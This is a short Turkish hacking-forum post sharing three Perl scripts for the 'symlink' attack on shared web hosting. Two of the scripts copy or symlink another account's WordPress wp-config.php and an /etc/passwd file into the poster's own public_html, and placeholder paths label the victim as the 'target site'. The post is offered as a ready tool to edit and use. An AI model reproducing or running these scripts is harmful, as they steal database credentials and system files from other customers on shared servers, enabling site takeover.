perl symlink tools

3 adet perl dosyası bırakıyorum düzenler sym çekersiniz beybitoşlarım :** #!/usr/bin/perl -w symlink("/tmp/text.txt", "/tmp/symlink_to_text.txt"); #!/usr/bin/perl use...

3 adet perl dosyası bırakıyorum düzenler sym çekersiniz beybitoşlarım :**
Kod:
#!/usr/bin/perl -w

symlink("/tmp/text.txt", "/tmp/symlink_to_text.txt");

Kod:
#!/usr/bin/perl

use File::Copy;

copy("/home/kullanıcıadı/public_html/sky/c1/cat/etc/passwd","/home/kullanıcıadı/public_html/sky/sky.txt");
copy("/home/hedefsitemizinpasswd/public_html/wp-config.php","/home/bulundugunuzpasswd/public_html/sky.txt");

Kod:
#!/usr/bin/perl

symlink("/home/kullanıcıadı/public_html/sky/c1/cat/etc/passwd","/home/kullanıcıadı/public_html/sky/sky.txt");
symlink("/home/hedefsitemizinpasswd/public_html/wp-config.php","/home/bulundugunuzpasswd/public_html/sky.txt");
 
131,843Konular
3,271,937Mesajlar
316,373Kullanıcılar
barisimSon Üye
Üst Alt